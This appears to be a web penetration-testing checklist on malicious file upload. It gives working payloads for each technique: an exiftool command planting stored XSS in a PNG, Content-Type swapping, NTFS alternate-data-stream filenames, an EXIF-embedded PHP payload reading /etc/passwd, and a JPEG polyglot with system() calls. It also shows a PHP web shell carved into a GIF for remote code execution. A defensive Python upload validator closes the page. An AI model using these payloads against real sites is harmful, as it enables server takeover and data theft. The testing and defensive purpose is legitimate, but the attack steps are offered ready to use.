Upload of Malicious Files

Check List

Methodology

Black Box

XSS Stored via Upload avatar PNG [HTML]

1. Create Malicious PNG Payload
   Download the XSS payload PNG from
   https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/XSS%20Injection/Files/xss_comment_exif_metadata_double_quote.png
   or use exiftool to embed it yourself:
   exiftool -Comment="\"><script>alert(prompt('XSS BY ZEROX4'))</script>" xss_comment_exif_metadata_double_quote.png

2. Access Avatar Upload Page
   Locate the avatar upload form.

3. Intercept Upload Request in Burp Suite

4. Modify Content-Type to text/html
   Edit the Content-Type header for the uploaded file from image/png to text/html in the request.

5. Submit Modified Request
   Forward the altered request to upload the malicious PNG as HTML.

6. Verify Stored XSS Execution
   Confirm the file is saved on example.com and access it to trigger the alert payload.


NTFS Alternate Data Streams (ADS) abuse

1. Sometimes applications identify file types based only on their first signature bytes. Adding or replacing them in a file might trick the application:

   PNG: \x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03[
   JPG: \xff\xd8\xff
   GIF: GIF87a OR GIF89a

2. Using an NTFS alternate data stream (ADS) on Windows: a colon character ":" is inserted after a forbidden extension and before a permitted one. As a result, an empty file with the forbidden extension is created on the server ("file.asax:.jpg"). This file might be edited later using other techniques, such as its short filename. The "::$data" pattern can also be used to create non-empty files, and adding a dot character after this pattern might bypass further restrictions ("file.asp::$data.").


EXIF Metadata Webshell

1. Find a nice picture and embed the shell into the image like this:
   exiftool -documentname='<?php echo file_get_contents("/etc/passwd"); ?>' picture.png

2. Rename the jpg/png picture to the .php extension.

3. Upload the picture.

4. You will get a 500 error page. Ignore it. Grep the time from the response and convert it to a timestamp.

5. Use the timestamp to find your shell:
   https://example.org/uploads/profile/[USERNAME][timestamp].php


Polyglot File Upload

1. A Magic Number is a unique sequence of bytes at the beginning of a file that identifies its type. Even if a file's extension is changed, the Magic Number helps the system recognize the actual file format. Examples:

   PNG files start with: 89 50 4E 47 0D 0A 1A 0A
   PDF files start with: %PDF- (for example %PDF-1.7)

   Content-Disposition: form-data; name="image"; filename="img.jpg"
   Content-Type: image/jpeg

   ÿØÿàJFIFÿÛC -> jpg Magic Number
   ... (binary data) ...
   ÿÙ

2. I uploaded a normal .jpg image, and the server accepted it, returning a 200 OK status.

Exploit Attempt

3. I re-sent the exact same request, but this time I modified the image content by embedding the PHP shell code inside it.

4. Then I sent the request again with the file extension changed to .php:

   Content-Disposition: form-data; name="image"; filename="img.php" -> change to .PHP
   Content-Type: image/jpeg

   ÿØÿàJFIFÿÛC
   ... (binary data) ...
   <?php
   echo "<pre>";
   system("uname -a");
   echo "</pre>";
   ?>
   ÿÙ

5. Result: the server accepted the modified file and returned 200 OK.


GIF Image Carving (PHP Payload Injection)

1. Identify possible image formats (starting with GIF).

2. Test how the server transforms the uploaded image.

3. Replicate these transformations locally using ImageMagick and PHP.

4. Determine if any sections of the image remain unmodified.

5. Inject PHP code into those sections and test execution.

Testing with GIF

6. I began with a simple one-color (black) GIF image to easily spot modifications. After uploading and downloading the image, I compared the original and transformed versions. The transformations included:

   Stripping EXIF data
   Resizing the image to 300x300 pixels

   To replicate this locally, I used the following PHP script:

   <?php
   // Load the test GIF, resize it the way the server does, and write the
   // result out so the two files can be diffed byte by byte.
   $thumb = new Imagick('testgif.gif');
   $thumb->resizeImage(300, 300, Imagick::FILTER_LANCZOS, 1);
   $thumb->writeImage('testgif2.gif');
   $thumb->destroy();
   ?>

7. Through testing, I identified an unmodified section of the GIF file filled with 00 values. This provided enough space to inject my PHP payload.

8. Payload Injection: using a hex editor in Burp Suite, I inserted the following PHP code into the GIF file:

   <?php phpinfo();?>
   <?php system($_GET['c']);?>

9. By carving these payloads into the unmodified section of the GIF file, I successfully achieved remote code execution after uploading the modified image.
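Every bypass collected above (Content-Type switching, ADS-style filenames, magic-number polyglots and PHP carved into a surviving GIF section) works because the server trusts a single signal. As an added example, not code from this page or from any tool it references, the following Python validator is assumed to run before the upload is written to disk; it checks the filename, the declared Content-Type and the file body against each other and rejects each of the samples shown in the sections above:

```python
import re

# Magic numbers quoted on this page: PNG, JPEG and GIF (GIF87a / GIF89a).
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# One allowed extension -> the only Content-Type accepted for it.
ALLOWED_EXT = {"png": "image/png", "jpg": "image/jpeg", "gif": "image/gif"}
# PHP open tag anywhere in the body (polyglot and GIF-carving cases above).
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def validate_upload(filename: str, content_type: str, data: bytes):
    """Return (ok, reason). Assumed to be called before the file is saved."""
    # NTFS stream names ("file.asax:.jpg", "file.asp::$data.") need a colon;
    # no legitimate image name contains one, so reject rather than strip.
    if ":" in filename:
        return False, "colon / alternate data stream in filename"
    # Drop trailing dots and spaces (Windows removes them on save), keep only
    # the last path component, and require exactly one known extension.
    base = filename.rstrip(". ").replace("\\", "/").rsplit("/", 1)[-1]
    parts = base.split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "double or missing extension"
    ext = parts[1].lower()
    ext = "jpg" if ext == "jpeg" else ext
    if ext not in ALLOWED_EXT:
        return False, f"extension .{ext} not allowed"
    # Declared type must match the extension: the image/png -> text/html
    # swap from the stored-XSS steps fails here.
    declared = content_type.split(";", 1)[0].strip().lower()
    if declared != ALLOWED_EXT[ext]:
        return False, "Content-Type does not match extension"
    # Body must start with the magic bytes for that extension.
    if not any(data.startswith(m) for m in MAGIC[ext]):
        return False, "magic bytes do not match extension"
    # A valid image header is not enough: polyglots and carved GIFs carry
    # PHP tags further into the body.
    if PHP_TAG.search(data):
        return False, "embedded PHP tag"
    return True, "ok"
```

Even when all checks pass, store the file under a server-generated name outside the web root and re-encode it server-side; the GIF carving write-up shows that re-encoding alone can leave regions untouched, which is why the body scan and the name checks stay in place.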


White Box

Cheat Sheet
